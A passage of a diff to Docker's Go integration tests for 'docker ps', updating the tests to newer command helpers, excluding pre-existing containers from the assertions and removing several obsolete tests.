correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID) expected = []string{secondID, firstID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not 
in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "before="+thirdID) expected = []string{secondID, firstID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) // filter since & before out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-a") expected = []string{thirdID, secondID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID) expected = []string{secondID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out)) // filter since & limit out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2", "-a") expected = []string{fourthID, thirdID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & 
ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2") - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out)) // filter before & limit out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1", "-a") expected = []string{thirdID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1") - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) // filter since & filter before & limit out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1", "-a") expected = []string{thirdID} - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the 
correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1") - c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + c.Assert(assertContainerList(RemoveOutputForExistingElements(out, existingContainers), expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) } @@ -136,13 +137,6 @@ func assertContainerList(out string, expected []string) bool { return true } -// FIXME(vdemeester) Move this into a unit test in daemon package -func (s *DockerSuite) TestPsListContainersInvalidFilterName(c *check.C) { - out, _, err := dockerCmdWithError("ps", "-f", "invalidFilter=test") - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "Invalid filter") -} - func (s *DockerSuite) TestPsListContainersSize(c *check.C) { // Problematic on Windows as it doesn't report the size correctly @swernli testRequires(c, DaemonIsLinux) @@ -152,20 +146,18 @@ func (s *DockerSuite) TestPsListContainersSize(c *check.C) { baseLines := strings.Split(strings.Trim(baseOut, "\n "), "\n") baseSizeIndex := strings.Index(baseLines[0], "SIZE") baseFoundsize := baseLines[1][baseSizeIndex:] - baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, " ")[0]) + baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, "B")[0]) c.Assert(err, checker.IsNil) name := "test_size" dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo 1 > test") - id, err := getIDByName(name) - c.Assert(err, checker.IsNil) + id := getIDByName(c, name) - runCmd := exec.Command(dockerBinary, "ps", "-s", "-n=1") - var out 
string + var result *icmd.Result wait := make(chan struct{}) go func() { - out, _, err = runCommandWithOutput(runCmd) + result = icmd.RunCommand(dockerBinary, "ps", "-s", "-n=1") close(wait) }() select { @@ -173,99 +165,105 @@ func (s *DockerSuite) TestPsListContainersSize(c *check.C) { case <-time.After(3 * time.Second): c.Fatalf("Calling \"docker ps -s\" timed out!") } - c.Assert(err, checker.IsNil) - lines := strings.Split(strings.Trim(out, "\n "), "\n") + result.Assert(c, icmd.Success) + lines := strings.Split(strings.Trim(result.Combined(), "\n "), "\n") c.Assert(lines, checker.HasLen, 2, check.Commentf("Expected 2 lines for 'ps -s -n=1' output, got %d", len(lines))) sizeIndex := strings.Index(lines[0], "SIZE") idIndex := strings.Index(lines[0], "CONTAINER ID") foundID := lines[1][idIndex : idIndex+12] c.Assert(foundID, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s", id[:12], foundID)) - expectedSize := fmt.Sprintf("%d B", (2 + baseBytes)) + expectedSize := fmt.Sprintf("%dB", 2+baseBytes) foundSize := lines[1][sizeIndex:] c.Assert(foundSize, checker.Contains, expectedSize, check.Commentf("Expected size %q, got %q", expectedSize, foundSize)) } func (s *DockerSuite) TestPsListContainersFilterStatus(c *check.C) { + existingContainers := ExistingContainerIDs(c) + // start exited container - out, _ := dockerCmd(c, "run", "-d", "busybox") + out := cli.DockerCmd(c, "run", "-d", "busybox").Combined() firstID := strings.TrimSpace(out) // make sure the exited container is not running - dockerCmd(c, "wait", firstID) + cli.DockerCmd(c, "wait", firstID) // start running container - out, _ = dockerCmd(c, "run", "-itd", "busybox") + out = cli.DockerCmd(c, "run", "-itd", "busybox").Combined() secondID := strings.TrimSpace(out) // filter containers by exited - out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited") + out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited").Combined() containerOut := strings.TrimSpace(out) - 
c.Assert(containerOut, checker.Equals, firstID) + c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, firstID) - out, _ = dockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running") + out = cli.DockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running").Combined() containerOut = strings.TrimSpace(out) - c.Assert(containerOut, checker.Equals, secondID) + c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, secondID) - result := dockerCmdWithTimeout(time.Second*60, "ps", "-a", "-q", "--filter=status=rubbish") - c.Assert(result, icmd.Matches, icmd.Expected{ + result := cli.Docker(cli.Args("ps", "-a", "-q", "--filter=status=rubbish"), cli.WithTimeout(time.Second*60)) + err := "Invalid filter 'status=rubbish'" + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + err = "Unrecognised filter value for status: rubbish" + } + result.Assert(c, icmd.Expected{ ExitCode: 1, - Err: "Unrecognised filter value for status", + Err: err, }) - // Windows doesn't support pausing of containers - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { // pause running container - out, _ = dockerCmd(c, "run", "-itd", "busybox") + out = cli.DockerCmd(c, "run", "-itd", "busybox").Combined() pausedID := strings.TrimSpace(out) - dockerCmd(c, "pause", pausedID) + cli.DockerCmd(c, "pause", pausedID) // make sure the container is unpaused to let the daemon stop it properly - defer func() { dockerCmd(c, "unpause", pausedID) }() + defer func() { cli.DockerCmd(c, "unpause", pausedID) }() - out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused") + out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused").Combined() containerOut = strings.TrimSpace(out) - c.Assert(containerOut, checker.Equals, pausedID) + c.Assert(RemoveOutputForExistingElements(containerOut, existingContainers), checker.Equals, pausedID) } } func (s *DockerSuite) 
TestPsListContainersFilterHealth(c *check.C) { + existingContainers := ExistingContainerIDs(c) // Test legacy no health check - out, _ := runSleepingContainer(c, "--name=none_legacy") + out := runSleepingContainer(c, "--name=none_legacy") containerID := strings.TrimSpace(out) - waitForContainer(containerID) + cli.WaitRun(c, containerID) - out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none") + out = cli.DockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none").Combined() containerOut := strings.TrimSpace(out) c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for legacy none filter, output: %q", containerID, containerOut, out)) // Test no health check specified explicitly - out, _ = runSleepingContainer(c, "--name=none", "--no-healthcheck") + out = runSleepingContainer(c, "--name=none", "--no-healthcheck") containerID = strings.TrimSpace(out) - waitForContainer(containerID) + cli.WaitRun(c, containerID) - out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none") + out = cli.DockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none").Combined() containerOut = strings.TrimSpace(out) c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for none filter, output: %q", containerID, containerOut, out)) // Test failing health check - out, _ = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s") + out = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s") containerID = strings.TrimSpace(out) waitForHealthStatus(c, "failing_container", "starting", "unhealthy") - out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy") + out = cli.DockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy").Combined() containerOut = strings.TrimSpace(out) c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected 
containerID %s, got %s for unhealthy filter, output: %q", containerID, containerOut, out)) // Check passing healthcheck - out, _ = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s") + out = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s") containerID = strings.TrimSpace(out) waitForHealthStatus(c, "passing_container", "starting", "healthy") - out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy") - containerOut = strings.TrimSpace(out) + out = cli.DockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy").Combined() + containerOut = strings.TrimSpace(RemoveOutputForExistingElements(out, existingContainers)) c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for healthy filter, output: %q", containerID, containerOut, out)) } @@ -286,8 +284,7 @@ func (s *DockerSuite) TestPsListContainersFilterID(c *check.C) { func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) { // start container dockerCmd(c, "run", "--name=a_name_to_match", "busybox") - id, err := getIDByName("a_name_to_match") - c.Assert(err, check.IsNil) + id := getIDByName(c, "a_name_to_match") // start another container runSleepingContainer(c, "--name=b_name_to_match") @@ -307,49 +304,43 @@ func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) { // - Run containers for each of those image (busybox, images_ps_filter_test1, images_ps_filter_test2) // - Filter them out :P func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) { + existingContainers := ExistingContainerIDs(c) + // Build images imageName1 := "images_ps_filter_test1" - imageID1, err := buildImage(imageName1, - `FROM busybox - LABEL match me 1`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, imageName1, build.WithDockerfile(`FROM busybox + LABEL match me 1`)) + imageID1 := getIDByName(c, imageName1) imageName1Tagged := 
"images_ps_filter_test1:tag" - imageID1Tagged, err := buildImage(imageName1Tagged, - `FROM busybox - LABEL match me 1 tagged`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, imageName1Tagged, build.WithDockerfile(`FROM busybox + LABEL match me 1 tagged`)) + imageID1Tagged := getIDByName(c, imageName1Tagged) imageName2 := "images_ps_filter_test2" - imageID2, err := buildImage(imageName2, - fmt.Sprintf(`FROM %s - LABEL match me 2`, imageName1), true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, imageName2, build.WithDockerfile(fmt.Sprintf(`FROM %s + LABEL match me 2`, imageName1))) + imageID2 := getIDByName(c, imageName2) // start containers dockerCmd(c, "run", "--name=first", "busybox", "echo", "hello") - firstID, err := getIDByName("first") - c.Assert(err, check.IsNil) + firstID := getIDByName(c, "first") // start another container dockerCmd(c, "run", "--name=second", "busybox", "echo", "hello") - secondID, err := getIDByName("second") - c.Assert(err, check.IsNil) + secondID := getIDByName(c, "second") // start third container dockerCmd(c, "run", "--name=third", imageName1, "echo", "hello") - thirdID, err := getIDByName("third") - c.Assert(err, check.IsNil) + thirdID := getIDByName(c, "third") // start fourth container dockerCmd(c, "run", "--name=fourth", imageName1Tagged, "echo", "hello") - fourthID, err := getIDByName("fourth") - c.Assert(err, check.IsNil) + fourthID := getIDByName(c, "fourth") // start fifth container dockerCmd(c, "run", "--name=fifth", imageName2, "echo", "hello") - fifthID, err := getIDByName("fifth") - c.Assert(err, check.IsNil) + fifthID := getIDByName(c, "fifth") var filterTestSuite = []struct { filterName string @@ -377,16 +368,16 @@ func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) { var out string for _, filter := range filterTestSuite { out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+filter.filterName) - checkPsAncestorFilterOutput(c, out, 
filter.filterName, filter.expectedIDs) + checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), filter.filterName, filter.expectedIDs) } // Multiple ancestor filter out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageName2, "--filter=ancestor="+imageName1Tagged) - checkPsAncestorFilterOutput(c, out, imageName2+","+imageName1Tagged, []string{fourthID, fifthID}) + checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), imageName2+","+imageName1Tagged, []string{fourthID, fifthID}) } func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expectedIDs []string) { - actualIDs := []string{} + var actualIDs []string if out != "" { actualIDs = strings.Split(out[:len(out)-1], "\n") } @@ -410,18 +401,15 @@ func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expe func (s *DockerSuite) TestPsListContainersFilterLabel(c *check.C) { // start container dockerCmd(c, "run", "--name=first", "-l", "match=me", "-l", "second=tag", "busybox") - firstID, err := getIDByName("first") - c.Assert(err, check.IsNil) + firstID := getIDByName(c, "first") // start another container dockerCmd(c, "run", "--name=second", "-l", "match=me too", "busybox") - secondID, err := getIDByName("second") - c.Assert(err, check.IsNil) + secondID := getIDByName(c, "second") // start third container dockerCmd(c, "run", "--name=third", "-l", "nomatch=me", "busybox") - thirdID, err := getIDByName("third") - c.Assert(err, check.IsNil) + thirdID := getIDByName(c, "third") // filter containers by exact match out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me") @@ -450,23 +438,19 @@ func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) { runSleepingContainer(c, "--name=sleep") dockerCmd(c, "run", "--name", "zero1", "busybox", "true") - firstZero, err := getIDByName("zero1") - c.Assert(err, checker.IsNil) + firstZero := getIDByName(c, "zero1") 
dockerCmd(c, "run", "--name", "zero2", "busybox", "true") - secondZero, err := getIDByName("zero2") - c.Assert(err, checker.IsNil) + secondZero := getIDByName(c, "zero2") out, _, err := dockerCmdWithError("run", "--name", "nonzero1", "busybox", "false") c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err)) - firstNonZero, err := getIDByName("nonzero1") - c.Assert(err, checker.IsNil) + firstNonZero := getIDByName(c, "nonzero1") out, _, err = dockerCmdWithError("run", "--name", "nonzero2", "busybox", "false") c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err)) - secondNonZero, err := getIDByName("nonzero2") - c.Assert(err, checker.IsNil) + secondNonZero := getIDByName(c, "nonzero2") // filter containers by exited=0 out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=0") @@ -486,15 +470,18 @@ func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) { func (s *DockerSuite) TestPsRightTagName(c *check.C) { // TODO Investigate further why this fails on Windows to Windows CI testRequires(c, DaemonIsLinux) + + existingContainers := ExistingContainerNames(c) + tag := "asybox:shmatest" dockerCmd(c, "tag", "busybox", tag) var id1 string - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id1 = strings.TrimSpace(string(out)) var id2 string - out, _ = runSleepingContainerInImage(c, tag) + out = runSleepingContainerInImage(c, tag) id2 = strings.TrimSpace(string(out)) var imageID string @@ -502,11 +489,12 @@ func (s *DockerSuite) TestPsRightTagName(c *check.C) { imageID = strings.TrimSpace(string(out)) var id3 string - out, _ = runSleepingContainerInImage(c, imageID) + out = runSleepingContainerInImage(c, imageID) id3 = strings.TrimSpace(string(out)) out, _ = dockerCmd(c, "ps", "--no-trunc") lines := strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) // skip header lines = lines[1:] c.Assert(lines, checker.HasLen, 3, 
check.Commentf("There should be 3 running container, got %d", len(lines))) @@ -525,46 +513,6 @@ func (s *DockerSuite) TestPsRightTagName(c *check.C) { } } -func (s *DockerSuite) TestPsLinkedWithNoTrunc(c *check.C) { - // Problematic on Windows as it doesn't support links as of Jan 2016 - testRequires(c, DaemonIsLinux) - runSleepingContainer(c, "--name=first") - runSleepingContainer(c, "--name=second", "--link=first:first") - - out, _ := dockerCmd(c, "ps", "--no-trunc") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - // strip header - lines = lines[1:] - expected := []string{"second", "first,second/first"} - var names []string - for _, l := range lines { - fields := strings.Fields(l) - names = append(names, fields[len(fields)-1]) - } - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array: %v, got: %v", expected, names)) -} - -func (s *DockerSuite) TestPsGroupPortRange(c *check.C) { - // Problematic on Windows as it doesn't support port ranges as of Jan 2016 - testRequires(c, DaemonIsLinux) - portRange := "3850-3900" - dockerCmd(c, "run", "-d", "--name", "porttest", "-p", portRange+":"+portRange, "busybox", "top") - - out, _ := dockerCmd(c, "ps") - - c.Assert(string(out), checker.Contains, portRange, check.Commentf("docker ps output should have had the port range %q: %s", portRange, string(out))) - -} - -func (s *DockerSuite) TestPsWithSize(c *check.C) { - // Problematic on Windows as it doesn't report the size correctly @swernli - testRequires(c, DaemonIsLinux) - dockerCmd(c, "run", "-d", "--name", "sizetest", "busybox", "top") - - out, _ := dockerCmd(c, "ps", "--size") - c.Assert(out, checker.Contains, "virtual", check.Commentf("docker ps with --size should show virtual size of container")) -} - func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) { // create a container out, _ := dockerCmd(c, "create", "busybox") @@ -595,73 +543,6 @@ func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) { 
c.Assert(cID, checker.HasPrefix, containerOut) } -func (s *DockerSuite) TestPsFormatMultiNames(c *check.C) { - // Problematic on Windows as it doesn't support link as of Jan 2016 - testRequires(c, DaemonIsLinux) - //create 2 containers and link them - dockerCmd(c, "run", "--name=child", "-d", "busybox", "top") - dockerCmd(c, "run", "--name=parent", "--link=child:linkedone", "-d", "busybox", "top") - - //use the new format capabilities to only list the names and --no-trunc to get all names - out, _ := dockerCmd(c, "ps", "--format", "{{.Names}}", "--no-trunc") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - expected := []string{"parent", "child,parent/linkedone"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names)) - - //now list without turning off truncation and make sure we only get the non-link names - out, _ = dockerCmd(c, "ps", "--format", "{{.Names}}") - lines = strings.Split(strings.TrimSpace(string(out)), "\n") - expected = []string{"parent", "child"} - var truncNames []string - truncNames = append(truncNames, lines...) - c.Assert(expected, checker.DeepEquals, truncNames, check.Commentf("Expected array with truncated names: %v, got: %v", expected, truncNames)) -} - -// Test for GitHub issue #21772 -func (s *DockerSuite) TestPsNamesMultipleTime(c *check.C) { - runSleepingContainer(c, "--name=test1") - runSleepingContainer(c, "--name=test2") - - //use the new format capabilities to list the names twice - out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Names}}") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - expected := []string{"test2 test2", "test1 test1"} - var names []string - names = append(names, lines...) 
- c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with names displayed twice: %v, got: %v", expected, names)) -} - -func (s *DockerSuite) TestPsFormatHeaders(c *check.C) { - // make sure no-container "docker ps" still prints the header row - out, _ := dockerCmd(c, "ps", "--format", "table {{.ID}}") - c.Assert(out, checker.Equals, "CONTAINER ID\n", check.Commentf(`Expected 'CONTAINER ID\n', got %v`, out)) - - // verify that "docker ps" with a container still prints the header row also - runSleepingContainer(c, "--name=test") - out, _ = dockerCmd(c, "ps", "--format", "table {{.Names}}") - c.Assert(out, checker.Equals, "NAMES\ntest\n", check.Commentf(`Expected 'NAMES\ntest\n', got %v`, out)) -} - -func (s *DockerSuite) TestPsDefaultFormatAndQuiet(c *check.C) { - config := `{ - "psFormat": "default {{ .ID }}" -}` - d, err := ioutil.TempDir("", "integration-cli-") - c.Assert(err, checker.IsNil) - defer os.RemoveAll(d) - - err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) - c.Assert(err, checker.IsNil) - - out, _ := runSleepingContainer(c, "--name=test") - id := strings.TrimSpace(out) - - out, _ = dockerCmd(c, "--config", d, "ps", "-q") - c.Assert(id, checker.HasPrefix, strings.TrimSpace(out), check.Commentf("Expected to print only the container id, got %v\n", out)) -} - // Test for GitHub issue #12595 func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) { // TODO: Investigate why this fails on Windows to Windows CI further. 
@@ -669,22 +550,21 @@ func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) { originalImageName := "busybox:TestPsImageIDAfterUpdate-original" updatedImageName := "busybox:TestPsImageIDAfterUpdate-updated" - runCmd := exec.Command(dockerBinary, "tag", "busybox:latest", originalImageName) - out, _, err := runCommandWithOutput(runCmd) - c.Assert(err, checker.IsNil) + existingContainers := ExistingContainerIDs(c) - originalImageID, err := getIDByName(originalImageName) - c.Assert(err, checker.IsNil) + icmd.RunCommand(dockerBinary, "tag", "busybox:latest", originalImageName).Assert(c, icmd.Success) - runCmd = exec.Command(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...) - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.IsNil) - containerID := strings.TrimSpace(out) + originalImageID := getIDByName(c, originalImageName) - linesOut, err := exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput() - c.Assert(err, checker.IsNil) + result := icmd.RunCommand(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...) 
+ result.Assert(c, icmd.Success) + containerID := strings.TrimSpace(result.Combined()) + + result = icmd.RunCommand(dockerBinary, "ps", "--no-trunc") + result.Assert(c, icmd.Success) - lines := strings.Split(strings.TrimSpace(string(linesOut)), "\n") + lines := strings.Split(strings.TrimSpace(string(result.Combined())), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) // skip header lines = lines[1:] c.Assert(len(lines), checker.Equals, 1) @@ -694,18 +574,14 @@ func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) { c.Assert(f[1], checker.Equals, originalImageName) } - runCmd = exec.Command(dockerBinary, "commit", containerID, updatedImageName) - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.IsNil) - - runCmd = exec.Command(dockerBinary, "tag", updatedImageName, originalImageName) - out, _, err = runCommandWithOutput(runCmd) - c.Assert(err, checker.IsNil) + icmd.RunCommand(dockerBinary, "commit", containerID, updatedImageName).Assert(c, icmd.Success) + icmd.RunCommand(dockerBinary, "tag", updatedImageName, originalImageName).Assert(c, icmd.Success) - linesOut, err = exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput() - c.Assert(err, checker.IsNil) + result = icmd.RunCommand(dockerBinary, "ps", "--no-trunc") + result.Assert(c, icmd.Success) - lines = strings.Split(strings.TrimSpace(string(linesOut)), "\n") + lines = strings.Split(strings.TrimSpace(string(result.Combined())), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) // skip header lines = lines[1:] c.Assert(len(lines), checker.Equals, 1) @@ -736,6 +612,8 @@ func (s *DockerSuite) TestPsNotShowPortsOfStoppedContainer(c *check.C) { } func (s *DockerSuite) TestPsShowMounts(c *check.C) { + existingContainers := ExistingContainerNames(c) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() mp := prefix + slash + "test" @@ -749,7 +627,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { // bind mount container var 
bindMountSource string var bindMountDestination string - if DaemonIsWindows.Condition() { + if DaemonIsWindows() { bindMountSource = "c:\\" bindMountDestination = "c:\\t" } else { @@ -762,6 +640,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}") lines := strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 3) fields := strings.Fields(lines[0]) @@ -772,7 +651,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { fields = strings.Fields(lines[1]) c.Assert(fields, checker.HasLen, 2) - annonymounsVolumeID := fields[1] + anonymousVolumeID := fields[1] fields = strings.Fields(lines[2]) c.Assert(fields[1], checker.Equals, "ps-volume-test") @@ -781,6 +660,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=ps-volume-test") lines = strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 1) fields = strings.Fields(lines[0]) @@ -794,10 +674,11 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+mp) lines = strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 2) fields = strings.Fields(lines[0]) - c.Assert(fields[1], checker.Equals, annonymounsVolumeID) + c.Assert(fields[1], checker.Equals, anonymousVolumeID) fields = strings.Fields(lines[1]) c.Assert(fields[1], checker.Equals, "ps-volume-test") @@ -805,6 +686,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountSource) lines = strings.Split(strings.TrimSpace(string(out)), "\n") + 
lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 1) fields = strings.Fields(lines[0]) @@ -816,6 +698,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountDestination) lines = strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 1) fields = strings.Fields(lines[0]) @@ -828,24 +711,9 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0) } -func (s *DockerSuite) TestPsFormatSize(c *check.C) { - testRequires(c, DaemonIsLinux) - runSleepingContainer(c) - - out, _ := dockerCmd(c, "ps", "--format", "table {{.Size}}") - lines := strings.Split(out, "\n") - c.Assert(lines[1], checker.Not(checker.Equals), "0 B", check.Commentf("Should not display a size of 0 B")) - - out, _ = dockerCmd(c, "ps", "--size", "--format", "table {{.Size}}") - lines = strings.Split(out, "\n") - c.Assert(lines[0], checker.Equals, "SIZE", check.Commentf("Should only have one size column")) - - out, _ = dockerCmd(c, "ps", "--size", "--format", "raw") - lines = strings.Split(out, "\n") - c.Assert(lines[8], checker.HasPrefix, "size:", check.Commentf("Size should be appended on a newline")) -} - func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { + existing := ExistingContainerIDs(c) + // TODO default network on Windows is not called "bridge", and creating a // custom network fails on Windows fails with "Error response from daemon: plugin not found") testRequires(c, DaemonIsLinux) @@ -863,7 +731,7 @@ func (s *DockerSuite) 